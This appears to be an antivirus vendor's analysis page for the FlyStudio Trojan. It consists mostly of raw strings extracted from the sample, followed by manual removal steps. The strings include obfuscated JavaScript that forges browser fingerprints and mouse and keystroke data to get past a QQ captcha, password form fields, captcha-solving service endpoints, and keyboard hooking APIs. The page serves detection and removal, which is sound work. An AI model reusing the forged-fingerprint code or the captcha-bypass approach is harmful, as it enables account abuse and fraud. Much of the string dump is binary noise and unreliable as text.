_0xf21cxa["keyvalue"]["length"] = _0xf21cxd["length"] = 0

_0xf21cxa["url"] = _0xf21cx49;

_0xf21cxa["keyboards"] = _0xf21cxb;

_0xf21cxa["keyUpCnt"] = _0xf21cxc;

_0xf21cxa["keyUpValue"] = _0xf21cxd;

_0xf21cxa["keyvalue"] = [];

return _0xf21cx30 ? encodeURIComponent(_0xf21cx108.toString()) : "?Action=WebInfo&siteKey="   encodeURIComponent('<$=siteKey%>')   "&content="   encodeURIComponent(_0xf21cx108.toString())

_0xf21cxa["keyvalue"]["push"](_0xf21cxb2)

var _0xf21cx12d = (navigator["platform"] == "Win32") || (navigator["platform"] == "Windows");

var _0xf21cx132 = _0xf21cx12c["indexOf"]("Windows NT 5.0") > -1 || _0xf21cx12c["indexOf"]("Windows 2000") > -1;

var _0xf21cx133 = _0xf21cx12c["indexOf"]("Windows NT 5.1") > -1 || _0xf21cx12c["indexOf"]("Windows XP") > -1;

var _0xf21cx134 = _0xf21cx12c["indexOf"]("Windows NT 5.2") > -1 || _0xf21cx12c["indexOf"]("Windows 2003") > -1;

var _0xf21cx135 = _0xf21cx12c["indexOf"]("Windows NT 6.0") > -1 || _0xf21cx12c["indexOf"]("Windows Vista") > -1;

var _0xf21cx136 = _0xf21cx12c["indexOf"]("Windows NT 6.1") > -1 || _0xf21cx12c["indexOf"]("Windows 7") > -1;

var _0xf21cx13a = /firefox\/[\d.] /gi;

var _0xf21cx13b = /chrome\/[\d.] /gi;

return _0xf21cx138["match"](_0xf21cx139)["join"]("")

if (_0xf21cx138["indexOf"]("firefox") > 0) {

return _0xf21cx138["match"](_0xf21cx13a)["join"]("")

if (_0xf21cx138["indexOf"]("chrome") > 0) {

return _0xf21cx138["match"](_0xf21cx13b)["join"]("")

if (_0xf21cx138["indexOf"]("safari") > 0 && _0xf21cx138["indexOf"]("chrome") < 0) {

return _0xf21cx138["match"](_0xf21cx13c)["join"]("")

var _0xf21cx140 = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");

VSwf = _0xf21cx140.GetVariable("$version");

return encodeURIComponent(_0xf21cx108.toString());

var begintime = Math.floor(new Date().getTime() / 1000);

var keyUpCnt = 4;

var tokenid=Math.floor(Math.random()*2067831491 3565063022);

var ip=Math.floor(Math.random()*245 10);

var t1 = Math.floor(new Date().getTime() / 1000);

var endtime = new Date().getTime();

endtime = Math.floor(endtime / 1000);

var focusBlur_t = Math.floor(Math.random() * 980   1469);

var m_x = 238   Math.floor(Math.random() * 5   1);

var m_y = 141   Math.floor(Math.random() * 5   1);

var m_x1 = 179   Math.floor(Math.random() * 5   1);

var m_y1 = 280   Math.floor(Math.random() * 5   1);

var data = '{"mousemove":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '},{"t":'   t2   ',"x":'   m_x1   ',"y":'   m_y1   '}],"mouseclick":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '}],"keyvalue":['   t1   ','   t1   ','   t3   ','   t3   '],"user_Agent":"safari/601.1","resolutionx":375,"resolutiony":667,"winSize":[375,667],"url":"hXXp://captcha.qq.com/cap_union_new_show","refer":"hXXp://ui.ptlogin2.qq.com/cgi-bin/login","begintime":'   begintime   ',"endtime":'   endtime   ',"platform":2,"os":"IOS","keyboards":4,"flash":0,"pluginNum":0,"index":'   code_cnt1   ',"ptcz":"","tokenid":'   tokenid   ',"btokenid":null,"tokents":'   begintime   ',"ips":{"in":["'   ip   '"]},"colorDepth":24,"cookieEnabled":true,"timezone":8,"wDelta":0,"keyUpCnt":'   keyUpCnt   ',"keyUpValue":['   t1   ','   t1   ','   t3   ','   t3   '],"mouseUpValue":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '},{"t":'   t2   ',"x":'   m_x1   ',"y":'   m_y1   '}],"mouseUpCnt":'   mouseUpCnt   ',"mouseDownValue":[{"t":'   t1   ',"x":'   m_x   ',"y":'   m_y   '},{"t":'   t2   ',"x":'   m_x1   ',"y":'   m_y1   '}],"mouseDownCnt":'   mouseUpCnt   ',"orientation":[{"x":0,"y":0,"z":0},{"x":0,"y":0,"z":0}],"bSimutor":0,"focusBlur":{"in":['   focusBlur_in   '],"out":['   focusBlur_in   '],"t":['   focusBlur_t   ']},"fVersion":0,"charSet":"UTF-8","resizeCnt":0,"errors":[],"screenInfo":"375-667-667-24-*-*-*","elapsed":0,"clientType":"1","refreshcnt":'   code_cnt   ',"trycnt":'   code_cnt1   ',"jshook":4}';

keyUpCnt  = 4;

&password=

&softkey=

Content-Disposition: form-data; name="password"

{pass}

Content-Disposition: form-data; name="softkey"

{softkey}

Content-Disposition: form-data; name="image"; filename="System.Byte[]"

0L.xJ;?

%SHK-

[t%X_^Iy

.NW4u3

5H\UWSSHh

-FG9}<!

.Be$>;

-9Bh}

%UOel

/|$LHlha%%d

(#\M.XG>

,t.aiM

q%C((2

.vr!L

WudP

}DQW%d

M.He2

A.DNE

.tt-[R

,.NPgw

.ATi,O.l<J

WWo

-p.Az

~*k.HF

&A.tCDHPD

^.JYo4p$_r0(hT

YuI%U

^.uL/.#

UUYPC.zjX

o.kwFt

<.SB

(v.Et

%uA.<0

kernel32.dl

greport

&.exe

w%D.D0

N^NO.Oy

BHH9y.9@JJp.9y.LL

%d&&'

''&%$$#""!!

!D@%D*

%*.*f

/CmdTar

D<4,.UNLINK

I>.HLPq,

T%softw

b.MSVCR

h'.vDqf

*WS^*.* G1

EH%s<

.vZ{$7

%s:%d

Eh.dE7

CxZ%c

keyw

VUITaSMTP

.ndA)

//oGl.chs\

=l.nG

.QuiI

7.evs%k

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD

comdlg32.dll

RASAPI32.dll

WINMM.dll

WINSPOOL.DRV

ShellExecuteA

SetClientCertificate

25325900

tencent://message/?uin=10347904&Site=éª¨å¤´å·¥ä½œå®¤&Menu=yes

hXXp://VVV.gutou.cc/up/tongji.htm#miaozan

hXXp://vip.gutou.cc/sale.php#tag41

123456789

00003333

1.2.18

?456789:;<=

!"#$%&'()* ,-./0123

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

windows

MSWHEEL_ROLLMSG

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

MPR.dll

VERSION.dll

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.avi)|*.avi

RICHED32.DLL

RICHED20.DLL

WPFT532.CNV

WPFT632.CNV

EXCEL32.CNV

write32.wpc

Windows Write

mswrd632.wpc

Word for Windows 6.0

wword5.cnv

Word for Windows 5.0

mswrd832.cnv

mswrd632.cnv

Word 6.0/95 for Windows & Macintosh

html32.cnv

keywords

\u00%c%c

json_tokener_parse_ex: error %s at offset %d

json_tokener_comment: %s

HTTP HTTPS.

Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.536.2 Safari/534.10

Content-Length: %d

VVV.dywt.com.cn

(*.htm;*.html)|*.htm;*.html

.PAVCResourceException@@

%d-%d-%d

%Y-%m-%d

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.jpg;*.bmp;*.gif;*.ico;*.cur|JPG

(*.JPG)|*.jpg|BMP

(*.BMP)|*.bmp|GIF

(*.GIF)|*.gif|

(*.ICO)|*.ico|

(*.CUR)|*.cur||

[%s:%d]

Range: bytes=%s-

[%s:%d]

PASS %s

PASS ******

USER %s

E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp

SIZE %s

PORT

User-Agent: %s

Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Referer: %s

GET %s HTTP/1.1

HTTP/1.0

Cookie: %s

%d, %s

\\192.168.0.129\TCP\1037

NSPlayer/9.0.0.2980; {%s}; Host: %s

rmff_fix_header: assuming data.size=%i

rmff_fix_header: assuming data.num_packets=%i

rmff_fix_header: assuming prop.num_packets=%i

rmff_fix_header: setting prop.data_offset from %i to %i

rmff_fix_header: correcting prop.num_streams from %i to %i

rmff_fix_header: correcting prop.size from %i to %i

%s %s %s

Session: %s

Cseq: %u

%*s %s

%*s %u

CSeq: %u

rtsp://%s:%i

rtsp://%s:%i/%s

ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586

GUID: 00000000-0000-0000-0000-000000000000

[%s:%d]

User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)

Range: npt=%s-

%s/streamid=1

%s/streamid=0

Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play

If-Match: %s

RealChallenge2: %s, sd=%s

Title: %s

Copyright: %s

Author: %s

real: Content-length for description too big (> %uMB)!

Require: com.real.retain-entity-for-setup

SupportsMaximumASMBandwidth: 1

Bandwidth: %u

Challenge1: %s

hash output: %x %x %x %x

hash input: %x %x %x %x

stream=%u;rule=%u,

Illegal character '%c' in input.

;3 #>6.&

'2, / 0&7!4-)1#

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

.PAVCOleException@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

right-curly-bracket

left-curly-bracket

0123456789

C:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

WinExec

RegCreateKeyExA

GetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

CreateDialogIndirectParamA

EnumChildWindows

GetKeyState

HttpEndRequestA

HttpAddRequestHeadersA

InternetCrackUrlA

n.j.zO

.WOr'

2013, 7, 15, 5

FastVerCode.DLL

CCaptchaRecognizer::recognizeByCodeTypeAndUrl

hXXp://s1.uudati.com:

hXXp://s1.taskok.com:

hXXp://s1.uudama.com:

hXXp://s1.uuwise.com:

/Api/config.aspx

2.0.0.5

WiseClientAPI-2.0.0.5

CCaptchaRecognizer::__UpdateTKEY

CCaptchaRecognizer::_IsNeedLogin

/Api/DecodeImg.aspx

xxxxxxxxxxx

hXXp://p1.uuwise.net:

hXXp://p1.uudama.net:

hXXp://p1.taskok.com:

hXXp://p1.uuwise.com:

hXXp://p1.uudama.com:

CCaptchaRecognizer::easyRecognizeUrl

%d%d%d%d%d

CCaptchaRecognizer::_CalcRandomPort

/Api/VerifyAPIFile.aspx

/Api/UserLogin.aspx

CCaptchaRecognizer::login

/Api/UserReg.aspx

/Api/PayCard.aspx

/Api/ReportError.aspx

CCaptchaRecognizer::reportError

/Api/UserPoint.aspx

|2.0.0.5|

/Api/DecodeResult.aspx

ID/KEY/

ByTypeBytes.JPG

CHttpRequestHelper::_ReadResponse

User-Agent:WiseClient-2.0.0.5;

WiseClient-2.0.0.5

CHttpRequestHelper::_InternalRequest

CHttpRequestHelper::RequestGetImage

CHttpRequestHelper::RequestPost

ServerPort

UUExtConfig.ini

-:-:-.%d

tCRYPTDLL.DLL

3.cn.pool.ntp.org

2.cn.pool.ntp.org

1.cn.pool.ntp.org

0.cn.pool.ntp.org

cn.pool.ntp.org

\\.\PHYSICALDRIVE0

Microsoft Windows Millennium Edition

Microsoft Windows 98

Microsoft Windows 95

%s (Build %d)

Service Pack 6a (Build %d)

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009

Web Edition

Service Pack %d (Build %d)

Microsoft Windows NT

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003,

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 "R2"

Windows Server 2008

Windows Vista

Windows Server 2008 R2

Windows 7

ox-x-x-x-x-x

\Tencent\Users\*.*

nKERNEL32.DLL

mscoree.dll

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

!"#$%&'()* ,-.

UUWiseHelper.dll

uuwise.com

2, 0, 0, 5

1.0.0.1

!"#$%&'()* ,-

24, 0, 0, 1

hXXp://VVV.sz789.net/

Windows

1, 0, 6, 6

- Skin.dll

1.0.0.0

Bugreport

(*.*)

Grid.Document

%original file name%.exe_3796_rwx_015D0000_00072000:

`.rsrc

kernel32.dll

Windows

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

USER32.DLL

oleaut32.dll

EVariantBadIndexError

ssShift

htKeyword

EInvalidOperation

u%CNu

%s_%d

EInvalidGraphicOperation

comctl32.dll

uxtheme.dll

MAPI32.DLL

!"#$%xi_

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

ssHotTrack

TWindowState

poProportional

TWMKey

KeyPreview

WindowState

OnKeyDown

OnKeyPressl

OnKeyUp

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

User32.dll

AutoHotkeys

TMainMenuDp`

TKeyEvent

TKeyPressEvent

HelpKeyword,

crSQLWait

%s (%s)

imm32.dll

readnowid.mtx

D:\ksreg_delphi\V9\_rsa_delphi_dll\UnitSock.pas

1iu2.iu

333333333333333333

33333833

3333333333333338

:*"*"$3338

33333333

33333333333

3333333333338

33338?383

333333333333

:*3:"$3338

333333333333333

KWindows

UrlMon

GetCPInfo

RegOpenKeyExA

RegCloseKey

SetViewportOrgEx

UnhookWindowsHookEx

SetWindowsHookExA

MapVirtualKeyA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyState

GetKeyNameTextA

EnumWindows

EnumThreadWindows

ActivateKeyboardLayout

GetKeyboardType

38000=344

.idata

.edata

P.reloc

P.rsrc

#yfP.re

KERNEL32.DLL

advapi32.dll

gdi32.dll

user32.dll

version.dll

wsock32.dll

rsadll.dll

No help keyword specified.

No help found for %s#No context-sensitive help installed$No topic-based help system installed

Alt  Clipboard does not support Icons/Menu '%s' is already being used by another form

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Unsupported clipboard format

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot open file "%s". %s

Invalid stream format$''%s'' is not a valid component name

Invalid property value List capacity out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d) Out of memory while expanding memory stream

Error reading %s%s%s: %s

Ancestor for '%s' not found

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

External exception %x

Interface not supported

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

I/O error %d

Integer overflow Invalid floating point operation

%original file name%.exe_3796_rwx_10000000_0003E000:

`.rsrc

L$(h%f

SSh0j

hu2.iu

msctls_hotkey32

TVCLHotKey

THotKey

\skinh.she

}uo,x6l5k%x-l h

9p%s m)t4`#b

e"m?c&y1`Ð<

SetViewportOrgEx

SetViewportExtEx

SetWindowsHookExA

UnhookWindowsHookEx

EnumThreadWindows

EnumChildWindows

`c%US.4/

!#$<#$#=

.text

`.rdata

@.data

.rsrc

@.UPX0

`.UPX1

`.reloc

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

1, 0, 6, 6

- Skin.dll

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

Bugreport.dll:512
%original file name%.exe:2060
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\data\Bugreport.ini (48 bytes)
C:\data\Bugreport_error.ini (1693 bytes)
C:\%original file name%.exe (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S09T3NA0.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\JR6VY9G6.txt (409 bytes)
C:\data\Gutou.ini (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YAACNF8Y.txt (130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\stat[1].htm (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\core[1].js (765 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\icon_11[1].gif (913 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\tongji[1].htm (952 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\X3F62G2R.txt (93 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\17287617[1].js (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\pic[1].gif (719 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D9YRB8N4.txt (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HMGGW7AX.txt (261 bytes)
C:\data\Bugreport.dll (629 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\stat[1].js (2459 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Win32.FlyStudio_36f49424fb

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Win32.FlyStudio_36f49424fb

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet